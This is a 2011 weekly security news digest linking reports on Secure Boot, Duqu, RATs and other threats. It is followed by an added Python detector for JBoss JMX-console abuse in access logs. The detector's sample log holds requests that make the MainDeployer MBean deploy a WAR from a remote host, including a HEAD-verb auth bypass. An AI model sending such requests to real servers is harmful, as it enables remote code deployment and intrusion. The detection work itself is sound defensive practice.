Confirmed Security News 2011 Week 44

=> White Paper: Secure Boot impact on Linux . 28/10/2011. «Last month Steven Sinofsky from Microsoft announced new requirements for manufacturers wanting to ship Windows 8 systems, including a feature called “Secure Boot”. Canonical, together with Red Hat, today publishes a white paper highlighting the implications of these requirements for users and manufacturers (…).»
Source: blog.canonical.com/2011/10/28/white-paper-secure-boot-impact-on-linux/
Related posts:
24/10/2011. Trusted Computing 2.1 : www.lightbluetouchpaper.org/2011/10/24/trusted-computing-2-1/
28/10/2011. Uefi secure boot impact on linux [pdf] : ozlabs.org/docs/uefi-secure-boot-impact-on-linux.pdf
28/10/2011. UEFI : une nouvelle bataille du TPM ? : www.cnis-mag.com/uefi-une-nouvelle-bataille-du-tpm.html
31/10/2011. Secure measured boot in Windows 8 : www.jwsecure.com/2011/10/18/secure-measured-boot-in-windows-8/
01/11/2011. Linux Foundation Says UEFI Doesn’t Have to Prevent Other OS Installations : threatpost.com/en_us/blogs/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111

=> Text-Based CAPTCHAs Cracked by Decaptcha Tool. 31/10/2011. «A team of researchers from Stanford University managed to create a tool that deciphers the CAPTCHAs utilized by Wikipedia, eBay, CNN and other popular websites that rely on them to counterattack automated interactions. (…).»
Source: news.softpedia.com/news/Text-Based-CAPTCHAs-Cracked-by-Decaptcha-Tool-231245.shtml
Related posts:
31/10/2011. Source: twitter.com/#!/ChadChoron/statuses/131059107972120577
31/10/2011. Text-based CAPTCHA Strengths and Weaknesses CSS2011 by Bursztein, Martin, Mitchell [pdf] : cdn.ly.tl/publications/text-based-captcha-strengths-and-weaknesses.pdf

=> Exposing the Market for Stolen Credit Cards Data. 31/10/2011. «In this intelligence brief, I will expose the market for stolen credit cards data, by profiling 20 currently active and responding gateways for processing of fraudulently obtained financial data (…).»
Source: ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards.html

=> Piwik ≤ 1.5.1 multiple XSS vulnerabilities. 31/10/2011. «Some time ago I discovered a few interesting XSS vulnerabilities in Piwik Open Source Web Analytics software. Thanks to the developers, all of those are now fixed in Piwik 1.6. But nonetheless, these are not the usual XSS cases, so I found them interesting enough to publish this (…).»
Source: blog.kotowicz.net/2011/10/piwik-151-multiple-xss-vulnerabilities.html

=> Duqu: Status Updates Including Installer with Zero-Day Exploit Found. 01/11/2011. «The group that initially discovered the original Duqu binaries, CrySyS, has since located an installer for the Duqu threat. Thus far, no-one had been able to recover the installer for the threat and therefore no-one had any idea how Duqu was initially infecting systems. Fortunately, an installer has recently been recovered due to the great work done by the team at CrySyS. (…).»
Source: www.symantec.com/connect/w32-duqu_status-updates_installer-zero-day-exploit
Related posts:
01/11/2011. Duqu Installer Contains Windows Kernel Zero Day : threatpost.com/en_us/blogs/duqu-installer-contains-windows-kernel-zero-day-110111
01/11/2011. Duqu dropper recovered! : www.crysys.hu/
01/11/2011. Updated whitepaper (version 1.3) Symantec W32_Duqu [pdf] : www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf
02/11/2011. The Mystery of Duqu: Part Three : www.securelist.com/en/blog/208193206/The_Mystery_of_Duqu_Part_Three

=> AntiCloud Trojan Reverse Engineering Analysis. 01/11/2011. «In this paper we are going to talk about the AntiCloud Trojan, also known as the TrojanDropper:Win32/Bohu.A and B variant. This malware originated in China and was designed to target the cloud-based technology of major Chinese antivirus vendors. For this reason, Bohu has also been called AntiCloud Trojan. This is the first malware to specifically target cloud-based technologies and will likely set a trend (…).»
Source: resources.infosecinstitute.com/anticloud-trojan-reversed/

=> Identifying an attacker who forged their source IP address. 02/11/2011. «At the OARC meeting in Vienna, on 29 October 2011, Duane Wessels gave a very interesting (and very technical) talk, "Tracing a DNS reflection attack" (see his slides). The talk presents the analysis of a denial-of-service attack that used the DNS root servers. What makes it original is the discovery of a method for identifying where the attacker is, even though the attacker puts forged source IP addresses in the packets (…).»
Source: www.bortzmeyer.org/identifier-spoofer.html
Related posts:
29/10/2011. Tracing a DNS Reflection Attack Oct2011 Wessels : www.dns-oarc.net/files/workshop-201110/tracing-dns-reflection.pdf

=> FINCEN.GOV – Financial Crimes Enforcement Network compromised. 03/11/2011. «It is a BlackHole Exploit Kit (…).»
Source: internetpol.fr/wup/?fincen.gov+-+Financial+Crimes+Enforcement+Network+Compromised#6b5d09859e0d63bf1e6414274821c327

=> Made in the Czech Republic: a PHP Autorun worm. 03/11/2011. «The Czech text above is displayed by the worm inside a console window and translates to: “Initializing. This operation can take several minutes. Please wait…”, pretending to be a message from Microsoft. (…) But in this case, the worm is written entirely in PHP and “converted” to a PE file using the Bambalam PHP EXE Compiler/Embedder. (…).»
Source: blog.eset.com/2011/11/03/made-in-the-czech-republic-a-php-autorun-worm
Related posts:
03/11/2011. Win32/AutoRun.PSW.Agent.E (aka PHP Autorun worm) VT result 14/43 : twitter.com/#!/2gg/statuses/132156164606672896

=> Poison Ivy RAT Still Giving Users a Rash. 03/11/2011. «The Poison Ivy malware kit is old. It was first seen in 2005, which makes it about 762 years old in Internet years. But that doesn’t mean it’s no longer useful, as evinced by the data collected by Microsoft in a new report on the tool, which shows that it is still in active use and is turning up on thousands of infected PCs (…).»
Source: threatpost.com/en_us/blogs/poison-ivy-rat-still-giving-users-rash-110311
Related posts:
01/11/2011. MMPC – Threat Report: Poison Ivy Oct2011 [pdf] : download.microsoft.com/download/E/1/5/E1552019-2022-4D7D-A001-044D5AE9251D/MMPC%20Threat%20Report%20-%20Poison%20Ivy.pdf
01/11/2011. Poison and EyeStye, by the numbers : blogs.technet.com/b/mmpc/archive/2011/11/01/poison-and-eyestye-by-the-numbers.aspx

=> Malware Analysis: Dark Comet RAT. 04/11/2011. «In this blog post I will take a look at a RAT called Dark Comet. I will run through the capabilities provided by the tool, examine the associated network traffic, identify the encryption algorithm and show how the key can be identified with a little analysis of an infected host. (…).»
Source: www.contextis.co.uk/research/blog/darkcometrat/

=> Analysis of a Real JBOSS Hack. 05/11/2011. «This is an analysis of a recent attack observed on a large enterprise network. The attackers compromised multiple servers via JBOSS JMX console vulnerabilities (…).»
Source: blog.9bplus.com/analysis-of-jboss-hack-documented-attack
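JMX console abuse of the kind described above leaves a clear trail in web-server access logs, because the console is driven through plain HTTP requests. The Python script below is an added example, not code from this page or from the 9bplus write-up: the log lines it scans are constructed for the example, and the endpoint paths and parameter names it looks for (/jmx-console/HtmlAdaptor, action=invokeOp, the jboss.system:service=MainDeployer MBean) are the classic JBoss 4.x/5.x layout, assumed here rather than taken from the analysis.

```python
"""Spot JBoss JMX-console abuse in web-server access logs.

Added illustrative code; it is not part of the page or of the linked
9bplus analysis. The log lines in SAMPLE_LOG are constructed for the
example. Paths and parameter names follow the classic JBoss 4.x/5.x
jmx-console layout (HtmlAdaptor, action=invokeOp, the MainDeployer MBean).
"""
import re
from urllib.parse import unquote

# Apache/nginx combined-log prefix: ip ident user [ts] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Management endpoints that should never be reachable from untrusted networks.
ADMIN_PREFIXES = ("/jmx-console", "/web-console", "/invoker/")
# Query fragments typical of deploying attacker-supplied code through JMX.
DEPLOY_MARKERS = ("service=MainDeployer", "methodName=deploy", "methodName=addURL",
                  "service=DeploymentFileRepository", "methodName=store")
SAFE_METHODS = {"GET", "POST"}


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["path"] = unquote(d["path"])  # decode %xx so obfuscated parameters are visible
    return d


def classify(entry):
    """Return (severity, reasons) for one parsed entry; severity None = not interesting."""
    path = entry["path"]
    if not path.startswith(ADMIN_PREFIXES):
        return None, []
    reasons = ["request to JBoss management endpoint"]
    severity = "low"
    if 200 <= entry["status"] < 400:
        reasons.append("endpoint answered instead of rejecting (HTTP %d)" % entry["status"])
        severity = "high"
    if entry["method"] not in SAFE_METHODS:
        # A web.xml security-constraint listing only GET/POST lets other verbs through.
        reasons.append("non-GET/POST verb %s (auth-constraint bypass pattern)" % entry["method"])
        severity = "high"
    if any(marker in path for marker in DEPLOY_MARKERS):
        reasons.append("MBean invocation that deploys code")
        severity = "high"
        if "http://" in path.lower() or "https://" in path.lower():
            reasons.append("remote URL passed as deployment argument")
    return severity, reasons


def scan(lines):
    """Scan log lines; return findings as dicts with the parsed fields, severity and reasons."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        severity, reasons = classify(entry)
        if severity:
            findings.append({**entry, "severity": severity, "reasons": reasons})
    return findings


# Constructed sample, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Nov/2011:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 1234',
    '10.0.0.8 - - [05/Nov/2011:10:01:40 +0000] "GET /jmx-console/ HTTP/1.1" 401 0',
    '198.51.100.7 - - [05/Nov/2011:10:02:10 +0000] "GET /jmx-console/ HTTP/1.1" 200 5321',
    '198.51.100.7 - - [05/Nov/2011:10:02:31 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOp'
    '&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http%3A%2F%2F198.51.100.7%2Fx.war HTTP/1.1" 200 742',
    '198.51.100.9 - - [05/Nov/2011:10:05:00 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp'
    '&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://198.51.100.9/a.war HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["method"], f["path"][:60], "|", "; ".join(f["reasons"]))
```

Run it as a script to print the findings, or call scan() on real log lines. A "high" finding means the console answered a request it should have rejected, a verb other than GET/POST reached it, or an MBean invocation deployed code from an attacker-controlled URL; a denied probe (HTTP 401) is reported as "low". Detection is only the second line of defence: the console, web-console and invoker servlets should be removed or authenticated and restricted to a management network.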
